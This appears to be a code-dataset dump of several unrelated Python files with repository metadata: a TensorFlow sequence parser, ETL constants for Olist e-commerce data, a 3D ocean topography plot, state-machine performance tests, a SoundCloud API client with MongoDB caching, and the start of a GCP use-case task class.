] | 8 | 2021-05-11T12:12:23.000Z | 2022-02-10T09:56:14.000Z | tasks/parsing/parsers.py | karimcossentini/attend-copy-parse | 4acbe7bfc2be1b5c21c197a44b27143a9422b426 | [
"MIT"
] | 3 | 2021-08-11T06:44:56.000Z | 2022-03-14T09:16:03.000Z | tasks/parsing/parsers.py | rasmusbergpalm/attend-copy-parse | 4673be36db64e982ceabc1e29ff34a296917f969 | [
"MIT"
] | 2 | 2021-05-22T07:41:21.000Z | 2021-05-26T12:39:02.000Z | import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib.cudnn_rnn import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.layers.cudnn_rnn import CUDNN_RNN_BIDIRECTION
import os
from tasks.acp.data import RealData
class Parser:
def parse(self, x, context, is_training):
raise NotImplementedError()
def restore(self):
"""
Must return a tuple of (scope, restore_file_path).
"""
raise NotImplementedError()
class NoOpParser(Parser):
def restore(self):
return None
def parse(self, x, context, is_training):
return x
class OptionalParser(Parser):
def __init__(self, delegate: Parser, bs, seq_out, n_out, eos_idx):
self.eos_idx = eos_idx
self.n_out = n_out
self.seq_out = seq_out
self.bs = bs
self.delegate = delegate
def restore(self):
return self.delegate.restore()
def parse(self, x, context, is_training):
parsed = self.delegate.parse(x, context, is_training)
empty_answer = tf.constant(self.eos_idx, tf.int32, shape=(self.bs, self.seq_out))
empty_answer = tf.one_hot(empty_answer, self.n_out) # (bs, seq_out, n_out)
logit_empty = layers.fully_connected(context, 1, activation_fn=None) # (bs, 1)
return parsed + tf.reshape(logit_empty, (self.bs, 1, 1)) * empty_answer
class AmountParser(Parser):
"""
You should pre-train this parser to parse amounts otherwise it's hard to learn jointly.
"""
seq_in = RealData.seq_in
seq_out = RealData.seq_amount
n_out = len(RealData.chars)
scope = 'parse/amounts'
def __init__(self, bs):
os.makedirs("./snapshots/amounts", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/amounts/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
# Input RNN
in_rnn = CudnnLSTM(1, 128, direction=CUDNN_RNN_BIDIRECTION, name="in_rnn")
h_in, _ = in_rnn(tf.transpose(x, [1, 0, 2]))
h_in = tf.reshape(tf.transpose(h_in, [1, 0, 2]), (self.bs, self.seq_in, 1, 256)) # (bs, seq_in, 1, 128)
# Output RNN
out_input = tf.zeros((self.seq_out, self.bs, 1)) # consider teacher forcing.
out_rnn = CudnnLSTM(1, 128, name="out_rnn")
h_out, _ = out_rnn(out_input)
h_out = tf.reshape(tf.transpose(h_out, [1, 0, 2]), (self.bs, 1, self.seq_out, 128)) # (bs, 1, seq_out, 128)
# Bahdanau attention
att = tf.nn.tanh(layers.fully_connected(h_out, 128, activation_fn=None) + layers.fully_connected(h_in, 128, activation_fn=None))
att = layers.fully_connected(att, 1, activation_fn=None) # (bs, seq_in, seq_out, 1)
att = tf.nn.softmax(att, axis=1) # (bs, seq_in, seq_out, 1)
attended_h = tf.reduce_sum(att * h_in, axis=1) # (bs, seq_out, 128)
p_gen = layers.fully_connected(attended_h, 1, activation_fn=tf.nn.sigmoid) # (bs, seq_out, 1)
p_copy = (1 - p_gen)
# Generate
gen = layers.fully_connected(attended_h, self.n_out, activation_fn=None) # (bs, seq_out, n_out)
gen = tf.reshape(gen, (self.bs, self.seq_out, self.n_out))
# Copy
copy = tf.log(tf.reduce_sum(att * tf.reshape(x, (self.bs, self.seq_in, 1, self.n_out)), axis=1) + 1e-8) # (bs, seq_out, n_out)
output_logits = p_copy * copy + p_gen * gen
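            # Pointer-generator-style mixture: p_gen weights the generated
            # vocabulary logits while p_copy weights the (log of) attention
            # mass copied from the input characters.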
return output_logits
class DateParser(Parser):
"""
You should pre-train this parser to parse dates otherwise it's hard to learn jointly.
"""
seq_out = RealData.seq_date
n_out = len(RealData.chars)
scope = 'parse/date'
def __init__(self, bs):
os.makedirs("./snapshots/dates", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/dates/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
for i in range(4):
x = tf.layers.conv1d(x, 128, 3, padding="same", activation=tf.nn.relu) # (bs, 128, 128)
x = tf.layers.max_pooling1d(x, 2, 2) # (bs, 64-32-16-8, 128)
x = tf.reduce_sum(x, axis=1) # (bs, 128)
x = tf.concat([x, context], axis=1) # (bs, 256)
for i in range(3):
x = layers.fully_connected(x, 256)
x = layers.dropout(x, is_training=is_training)
x = layers.fully_connected(x, self.seq_out * self.n_out, activation_fn=None)
return tf.reshape(x, (self.bs, self.seq_out, self.n_out))
| 35.568182 | 140 | 0.613845 | 687 | 4,695 | 4 | 0.20524 | 0.041485 | 0.058224 | 0.039301 | 0.41048 | 0.308588 | 0.247089 | 0.157205 | 0.115721 | 0.086608 | 0 | 0.028242 | 0.260916 | 4,695 | 131 | 141 | 35.839695 | 0.763689 | 0.119702 | 0 | 0.256098 | 0 | 0 | 0.030049 | 0.01133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158537 | false | 0 | 0.073171 | 0.060976 | 0.47561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ac116e6c24e4369118ac69de62498b785f6e9 | 7,297 | py | Python | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | """ File with the definitions of constants for the ETL scripts. """
SCRIPTS_DIR = "scripts"
SCRIPTS_ETL_DIR = f"{SCRIPTS_DIR}/etl"
SCRIPTS_ETL_TRANSFORM = f"{SCRIPTS_ETL_DIR}/transform.sh"
VENV_BIN = ".venv/bin"
VENV_KAGGLE_BIN = f"{VENV_BIN}/kaggle"
DOCKER_DIR = "docker"
ENVARS_DIR = f"{DOCKER_DIR}/env.d"
DATA_DIR = f"{DOCKER_DIR}/database/data"
DATA_FILE_EXTENSION = ".csv"
KAGGLE_DATASETS = [
"olistbr/brazilian-ecommerce",
"nicapotato/womens-ecommerce-clothing-reviews",
]
OLIST_TABLE_CATEGORY_TRANSLATIONS = "product_category_name_translation"
OLIST_TABLE_GEOLOCATION = "olist_geolocation_dataset"
OLIST_TABLE_CUSTOMERS = "olist_customers_dataset"
OLIST_TABLE_ORDERS = "olist_orders_dataset"
OLIST_TABLE_PRODUCTS = "olist_products_dataset"
OLIST_TABLE_SELLERS = "olist_sellers_dataset"
OLIST_TABLE_ORDER_PAYMENTS = "olist_order_payments_dataset"
OLIST_TABLE_ORDER_REVIEWS = "olist_order_reviews_dataset"
OLIST_TABLE_ORDER_ITEMS = "olist_order_items_dataset"
OLIST_DATASET_TABLES = [
OLIST_TABLE_CATEGORY_TRANSLATIONS,
OLIST_TABLE_GEOLOCATION,
OLIST_TABLE_CUSTOMERS,
OLIST_TABLE_ORDERS,
OLIST_TABLE_PRODUCTS,
OLIST_TABLE_SELLERS,
OLIST_TABLE_ORDER_PAYMENTS,
OLIST_TABLE_ORDER_REVIEWS,
OLIST_TABLE_ORDER_ITEMS,
]
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP = {
"product_category_name": str,
"product_category_name_english": str,
}
OLIST_TABLE_CATEGORY_TRANSLATIONS_COLUMNS = (
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP.keys()
)
OLIST_TABLE_GEOLOCATION_TYPE_MAP = {
"geolocation_zip_code_prefix": str,
"geolocation_lat": float,
"geolocation_lng": float,
"geolocation_city": str,
"geolocation_state": str,
}
OLIST_TABLE_GEOLOCATION_COLUMNS = OLIST_TABLE_GEOLOCATION_TYPE_MAP.keys()
OLIST_TABLE_CUSTOMERS_TYPE_MAP = {
"customer_id": str,
"customer_unique_id": str,
"customer_zip_code_prefix": str,
"customer_city": str,
"customer_state": str,
}
OLIST_TABLE_CUSTOMERS_COLUMNS = OLIST_TABLE_CUSTOMERS_TYPE_MAP.keys()
OLIST_TABLE_ORDERS_TYPE_MAP = {
"order_id": str,
"customer_id": str,
"order_status": str,
"order_purchase_date": str,
"order_approved_at": str,
"order_delivered_carrier_date": str,
"order_delivered_customer_date": str,
"order_estimated_delivery_date": str,
}
OLIST_TABLE_ORDERS_COLUMNS = OLIST_TABLE_ORDERS_TYPE_MAP.keys()
OLIST_TABLE_PRODUCTS_TYPE_MAP = {
"product_id": str,
"product_category_name": str,
"product_name_lenght": str,
"product_description_lenght": "Int64",
"product_photos_qty": "Int64",
"product_weight_g": "Int64",
"product_length_cm": "Int64",
"product_height_cm": "Int64",
"product_width_cm": "Int64",
}
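# NB: "product_name_lenght"/"product_description_lenght" preserve the
# misspelled column names shipped in the upstream Olist CSVs; "fixing" the
# spelling here would break the mapping.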
OLIST_TABLE_PRODUCTS_COLUMNS = OLIST_TABLE_PRODUCTS_TYPE_MAP.keys()
OLIST_TABLE_SELLERS_TYPE_MAP = {
"seller_id": str,
"seller_zip_code_prefix": str,
"seller_city": str,
"seller_state": str,
}
OLIST_TABLE_SELLERS_COLUMNS = OLIST_TABLE_SELLERS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP = {
"order_id": str,
"payment_sequential": "Int64",
"payment_type": str,
"payment_installments": "Int64",
"payment_value": float,
}
OLIST_TABLE_ORDER_PAYMENTS_COLUMNS = OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP = {
"review_id": str,
"order_id": str,
"review_score": "Int64",
"review_comment_title": str,
"review_comment_message": str,
"review_creation_date": str,
"review_answer_date": str,
}
OLIST_TABLE_ORDER_REVIEWS_COLUMNS = OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_ITEMS_TYPE_MAP = {
"order_id": str,
"order_item_id": "Int64",
"product_id": str,
"seller_id": str,
"shipping_limit_date": str,
"price": float,
"freight_value": float,
}
OLIST_TABLE_ORDER_ITEMS_COLUMNS = OLIST_TABLE_ORDER_ITEMS_TYPE_MAP.keys()
OLIST_DATASET_TABLES_TYPES_MAP = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP,
OLIST_TABLE_GEOLOCATION: OLIST_TABLE_GEOLOCATION_TYPE_MAP,
OLIST_TABLE_CUSTOMERS: OLIST_TABLE_CUSTOMERS_TYPE_MAP,
OLIST_TABLE_ORDERS: OLIST_TABLE_ORDERS_TYPE_MAP,
OLIST_TABLE_PRODUCTS: OLIST_TABLE_PRODUCTS_TYPE_MAP,
OLIST_TABLE_SELLERS: OLIST_TABLE_SELLERS_TYPE_MAP,
OLIST_TABLE_ORDER_PAYMENTS: OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP,
OLIST_TABLE_ORDER_REVIEWS: OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP,
OLIST_TABLE_ORDER_ITEMS: OLIST_TABLE_ORDER_ITEMS_TYPE_MAP,
}
OLIST_DATASET_TABLES_NULLABLE_COLUMNS = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: [],
OLIST_TABLE_GEOLOCATION: [],
OLIST_TABLE_CUSTOMERS: [],
OLIST_TABLE_ORDERS: [],
OLIST_TABLE_PRODUCTS: [],
OLIST_TABLE_SELLERS: [],
OLIST_TABLE_ORDER_PAYMENTS: [],
OLIST_TABLE_ORDER_REVIEWS: ["review_comment_title", "review_comment_message"],
OLIST_TABLE_ORDER_ITEMS: [],
}
WECR_DATASET_TABLE = "Womens_Clothing_E-Commerce_Reviews"
WECR_COLUMN_ID = "Unnamed: 0"
WECR_COLUMN_CLOTHING_ID = "Clothing ID"
WECR_COLUMN_AGE = "Age"
WECR_COLUMN_TITLE = "Title"
WECR_COLUMN_REVIEW_TEXT = "Review Text"
WECR_COLUMN_RATING = "Rating"
WECR_COLUMN_RECOMMENDED_IND = "Recommended IND"
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT = "Positive Feedback Count"
WECR_COLUMN_DIVISION_NAME = "Division Name"
WECR_COLUMN_DEPARTMENT_NAME = "Department Name"
WECR_COLUMN_CLASS_NAME = "Class Name"
WECR_COLUMN_NAME_MAP = {
WECR_COLUMN_ID: "id",
WECR_COLUMN_CLOTHING_ID: WECR_COLUMN_CLOTHING_ID.lower().replace(" ", "_"),
WECR_COLUMN_AGE: WECR_COLUMN_AGE.lower().replace(" ", "_"),
WECR_COLUMN_TITLE: WECR_COLUMN_TITLE.lower().replace(" ", "_"),
WECR_COLUMN_REVIEW_TEXT: WECR_COLUMN_REVIEW_TEXT.lower().replace(" ", "_"),
WECR_COLUMN_RATING: WECR_COLUMN_RATING.lower().replace(" ", "_"),
WECR_COLUMN_RECOMMENDED_IND: WECR_COLUMN_RECOMMENDED_IND.lower().replace(" ", "_"),
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: WECR_COLUMN_POSITIVE_FEEDBACK_COUNT.lower().replace(
" ", "_"
),
WECR_COLUMN_DIVISION_NAME: WECR_COLUMN_DIVISION_NAME.lower().replace(" ", "_"),
WECR_COLUMN_DEPARTMENT_NAME: WECR_COLUMN_DEPARTMENT_NAME.lower().replace(" ", "_"),
WECR_COLUMN_CLASS_NAME: WECR_COLUMN_CLASS_NAME.lower().replace(" ", "_"),
}
WECR_DATASET_COLUMNS_TYPE_MAP = {
WECR_COLUMN_CLOTHING_ID: "Int64",
WECR_COLUMN_AGE: "Int64",
WECR_COLUMN_TITLE: str,
WECR_COLUMN_REVIEW_TEXT: str,
WECR_COLUMN_RATING: "Int64",
WECR_COLUMN_RECOMMENDED_IND: "Int64",
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: "Int64",
WECR_COLUMN_DIVISION_NAME: str,
WECR_COLUMN_DEPARTMENT_NAME: str,
WECR_COLUMN_CLASS_NAME: str,
}
WECR_DATASET_COLUMNS = WECR_DATASET_COLUMNS_TYPE_MAP.keys()
WECR_DATASET_NULLABLE_COLUMNS = [
WECR_COLUMN_AGE,
WECR_COLUMN_TITLE,
WECR_COLUMN_REVIEW_TEXT,
WECR_COLUMN_RATING,
WECR_COLUMN_RECOMMENDED_IND,
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT,
WECR_COLUMN_DIVISION_NAME,
WECR_COLUMN_DEPARTMENT_NAME,
WECR_COLUMN_CLASS_NAME,
]
def MACRO_GET_DATASET_DIR(table):
return f"{DATA_DIR}/{table}{DATA_FILE_EXTENSION}"
def MACRO_GET_REQUIRED_COLUMNS(dataframe, nullable_columns):
    required_cols = [col for col in dataframe.columns if col not in nullable_columns]
    return required_cols if len(required_cols) > 0 else None
| 33.319635 | 93 | 0.771139 | 947 | 7,297 | 5.346357 | 0.145723 | 0.142208 | 0.071104 | 0.028442 | 0.48094 | 0.259332 | 0.122062 | 0.065574 | 0.065574 | 0.065574 | 0 | 0.005047 | 0.131013 | 7,297 | 218 | 94 | 33.472477 | 0.793408 | 0.008086 | 0 | 0.0625 | 0 | 0 | 0.222268 | 0.097372 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010417 | false | 0 | 0 | 0.005208 | 0.020833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ac9ee875861cb5ac036cb18ed4ef985d32680 | 3,262 | py | Python | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | null | null | null | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | null | null | null | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | 1 | 2020-12-11T02:15:56.000Z | 2020-12-11T02:15:56.000Z |
# coding: utf-8
# This script makes a 3D plot of the Southern Ocean topography.
#
# The data comes from some geophysicists at Columbia. The product is "MGDS: Global Multi-Resolution Topography". These folks took all multibeam swath data that they can get their hands on and filled gaps with Smith and Sandwell. See http://www.marine-geo.org/portals/gmrt/ for data coverage.
import numpy as np
import matplotlib.pyplot as plt
# get_ipython().magic('matplotlib inline')
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import scipy as sp
import scipy.interpolate
import scipy.io as io
import seawater as sw
from pyspec import spectrum as spec
import cmocean
from mpl_toolkits.mplot3d import Axes3D
plt.close("all")
## select different regions
def subregion_plot(latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
lon = np.array([lonmin,lonmax,lonmax,lonmin,lonmin])
lat = np.array([latmin,latmin,latmax,latmax,latmin])
x,y = m(lon,lat)
return x,y
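# NB: subregion_plot relies on a global Basemap instance named m, which is
# never created in this script; the function is unused as written.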
def extract_topo(lon,lat,latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
flat = (lat>=latmin)&(lat<=latmax)
flon = (lon>=lonmin)&(lon<=lonmax)
lont = lon[flon]
latt = lat[flat]
topo = z[flat,:]
topo = topo[:,flon]
return lont,latt,topo
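# NB: extract_topo reads the global topography array z defined below, so it
# must only be called after the grid has been loaded.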
topo = Dataset('GMRTv3_1_20160124topo.grd')
pf = Dataset('SO_polar_fronts.v3.nc')
lonpf, latpf,latsaf,latsafn = pf['lon'][:], pf['latPF'][:],pf['latSAF'][:], pf['latSAFN'][:]
time = pf['is_aviso_nrt'][:]
latpf = latpf.reshape(time.size,lonpf.size)
latpf = np.nanmean(latpf,axis=0).squeeze()
latsaf = latsaf.reshape(time.size,lonpf.size)
latsaf = np.nanmean(latsaf,axis=0).squeeze()
latsafn = latsafn.reshape(time.size,lonpf.size)
latsafn = np.nanmean(latsafn,axis=0).squeeze()
x = topo['lon'][:]
y = topo['lat'][:]
#z = (topo['z'][:]).reshape(y.size,x.size)
z = topo['altitude'][:]
# get a subset
latmin, latmax = -80., -20
lonmin, lonmax = -180., 180.
flat = (y>=latmin)&(y<=latmax)
flon = (x>=lonmin)&(x<=lonmax)
lat = y[flat]
lon = x[flon]
z = z[flat,:]
z = z[:,flon]
z = np.ma.masked_array(z,z>=0)
x,y = np.meshgrid(lon,lat)
lon,lat = np.meshgrid(lon,lat)
z[z>=0]=0.
fig = plt.figure(figsize=(22,8))
ax = fig.add_subplot(111, projection='3d')
# this controls the quality of the plot
# set to =1 for maximum quality
dec = 10
#ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec], [-2000, -1000], cmap=cmocean.cm.bathy_r)
surf = ax.plot_surface(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],
linewidth=0, rstride=1, cstride=1, alpha=1, cmap='YlGnBu',
vmin=-5500,vmax=-500)
ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],[-1.,0],colors='peru')
ax.set_zticks([])
ax.view_init(75, 290)
#ax.plot(xpf,ypf,'w.')
#ax.plot(xsaf,ysaf,'w.')
lonpf[lonpf>180] = lonpf[lonpf>180]-360
ax.plot(lonpf,latpf,-2000,'w.')
ax.plot(lonpf,latsaf,-2000,'w.')
ax.plot(lonpf,latsafn,-2000,'w.')
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.745, 0.2, 0.02, 0.4])
fig.colorbar(surf, cax=cbar_ax,label=r'',extend='both')
#plt.savefig('SO3DTopo.pdf',bbox_inches='tight')
plt.savefig('SO3DTopo.png',bbox_inches='tight',dpi=300)
#plt.show()
| 23.467626 | 292 | 0.671061 | 532 | 3,262 | 4.071429 | 0.402256 | 0.024931 | 0.020776 | 0.027701 | 0.147276 | 0.099261 | 0.099261 | 0.099261 | 0.099261 | 0.087719 | 0 | 0.043741 | 0.137952 | 3,262 | 138 | 293 | 23.637681 | 0.726529 | 0.232066 | 0 | 0.056338 | 0 | 0 | 0.054282 | 0.018496 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0 | 0.15493 | 0 | 0.211268 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72e5ca0d5f1fd1ab089d27e8486d4e08350c674 | 2,136 | py | Python | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2020-07-28T20:17:52.000Z | 2020-07-28T20:17:52.000Z | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2021-01-25T15:54:45.000Z | 2021-01-25T15:54:45.000Z | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2021-01-22T06:12:10.000Z | 2021-01-22T06:12:10.000Z | from behavior_machine.library.parallel_state import ParallelState
import time
from behavior_machine.core import Board, StateStatus, State, Machine, machine
from behavior_machine.library import IdleState
def test_repeat_node_in_machine_fast():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition_on_success(ds2)
ds2.add_transition_on_success(ds3)
ds3.add_transition_on_success(ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_validate_transition_immediate():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition(lambda s, b: True, ds2)
ds2.add_transition(lambda s, b: True, ds3)
ds3.add_transition(lambda s, b: True, ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_multiple_parallel_states():
class CompleteState(State):
def execute(self, board: Board) -> StateStatus:
return StateStatus.SUCCESS
num_parallel = 500
child_states = []
for i in range(0, num_parallel):
child_states.append(CompleteState(f"I{i}"))
pp = ParallelState("parallel", child_states)
exe = Machine('exe', pp, end_state_ids=['parallel'], rate=100)
start_time = time.time()
exe.start(None)
exe.wait()
elapsed_time = time.time() - start_time
assert elapsed_time < (1/10)
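    # 500 parallel child states completing within 100 ms bounds the average
    # per-state scheduling overhead at roughly 0.2 ms.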
| 27.384615 | 77 | 0.654963 | 269 | 2,136 | 5.05948 | 0.27881 | 0.057311 | 0.044085 | 0.047024 | 0.551065 | 0.551065 | 0.505511 | 0.476121 | 0.476121 | 0.476121 | 0 | 0.038037 | 0.236891 | 2,136 | 77 | 78 | 27.74026 | 0.796933 | 0.047285 | 0 | 0.578947 | 0 | 0 | 0.023141 | 0 | 0 | 0 | 0 | 0 | 0.087719 | 1 | 0.105263 | false | 0 | 0.070175 | 0.017544 | 0.280702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ec4ac47db8b60c5ca290dce90179f2358006a | 3,580 | py | Python | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | import soundcloud
import os
import logging
from datetime import datetime
import requests
import sys
from celeryconfig import mongolab
import pymongo
from pymongo import MongoClient
from pymongo.errors import OperationFailure
USER = '/users/{_id}'
USER_TRACKS = '/users/{_id}/tracks'
USER_FOLLOWINGS = '/users/{_id}/followings'
USER_FOLLOWERS = '/users/{_id}/followers'
USER_WEB_PROFILES = '/users/{_id}/web-profiles'
TRACK = '/tracks/{_id}'
TRACK_COMMENTS = '/tracks/{_id}/comments'
TRACK_FAVORITERS = '/tracks/{_id}/favoriters'
TRACK_DOWNLOAD = '/tracks/{_id}/download'
TRACK_STREAM = '/tracks/{_id}/stream'
class RequestDB(object):
client = None
db = None
coll = None
logger = None
def __init__(self, db_name="soundcloud", logger=logging.getLogger("")):
self.logger = logger
self.client = MongoClient(mongolab)
self.db = self.client[db_name]
self.coll = self.db.requests
try:
            self.coll.create_index([("key", pymongo.ASCENDING)], unique=True)  # unique is a kwarg, not part of the key list
except OperationFailure as e:
logger.error("Could not create index.")
logger.error(e)
def get(self, key):
v = self.coll.find_one({"key": key})
if v is not None:
return v["value"]
else:
return None
def set(self, key, value):
now = datetime.utcnow()
doc = {"key": key, "value": value, "retrieved": now}
self.coll.update({"key": key}, doc, upsert=True)
self.logger.info("Stored {} in db".format(key))
def close(self):
        if self.client is not None:
            # pymongo Database objects have no close(); close the client instead
            self.client.close()
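# Cache usage sketch (hypothetical key/value):
#     db = RequestDB()
#     db.set("/users/123", {"username": "example"})
#     db.get("/users/123")   # -> {"username": "example"}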
class Sc(object):
_sc_client = None
_db = None
_logger = None
def __init__(self, sc_client=None, db_name="soundcloud",
logger=logging.getLogger("")):
self._logger = logger
if sc_client is None:
sc_client_id = os.getenv('SOUNDCLOUD_CLIENT_ID')
if sc_client_id is None:
err = "SOUNDCLOUD_CLIENT_ID was not set!"
self._logger.error(err)
sys.exit(err)
sc_client = soundcloud.Client(client_id=sc_client_id)
self._sc_client = sc_client
self._db = RequestDB(db_name, logger)
def get_sc(self, template, _id=None):
key = template.format(_id=_id) if _id is not None else template
self._logger.info("GET {}".format(key))
value = self._db.get(key)
if value is not None:
return value
else:
if _id is None:
res = self._sc_client.get(key, allow_redirects=False)
track_url = res.location
return requests.get(track_url, stream=True)
else:
res = self._sc_client.get(key)
if hasattr(res, "data"):
res1 = [dict(o.fields()) for o in res]
self._db.set(key, res1)
return res1
elif hasattr(res, "fields"):
res1 = dict(res.fields())
self._logger.info(repr(res1))
self._db.set(key, res1)
return res1
else:
return res
def __del__(self):
if self._db is not None:
self._db.close()
def prefill_user(user_id):
"""Cache the basic info on a user"""
sc = Sc(db_name="soundcloud")
for t in [USER, USER_WEB_PROFILES,
USER_FOLLOWINGS, USER_TRACKS, USER_FOLLOWERS]:
sc.get_sc(t, user_id)
| 30.862069 | 75 | 0.572626 | 440 | 3,580 | 4.452273 | 0.236364 | 0.033691 | 0.022971 | 0.016335 | 0.161307 | 0.161307 | 0.114344 | 0.0878 | 0.0878 | 0.03267 | 0 | 0.002854 | 0.314804 | 3,580 | 115 | 76 | 31.130435 | 0.79576 | 0.00838 | 0 | 0.081633 | 0 | 0 | 0.106095 | 0.038939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.102041 | 0 | 0.346939 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e730923173d6165ff991f322cce7b078b98b427d | 3,163 | py | Python | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 1 | 2022-01-12T08:31:59.000Z | 2022-01-12T08:31:59.000Z | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | null | null | null | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 2 | 2022-01-19T06:26:32.000Z | 2022-01-26T15:25:15.000Z | from api.gcp.tasks.baseTask import baseTask
from db.usecase.db_usecase_mgr import usecase_mgr
from googleapiclient.errors import HttpError
from utils.status_code import response_code
import traceback
import json
import logging
logger = logging.getLogger("main.api.gcp.tasks" + __name__)
class system_add_new_usecase(baseTask):
api_type = 'system'
api_name = 'system_add_new_usecase'
arguments = {
'usecase_name': {"type": str, "default": ''},
"region_country": {"type": str, "default": ''},
'validity_date': {"type": str, "default": ''},
"uc_des": {"type": str, "default": ''},
'admin_sa': {"type": str, "default": ''},
"budget": {"type": int, "default": 0},
'allow_cross_region': {"type": str, "default": ''},
"resources_access": {"type": str, "default": ''},
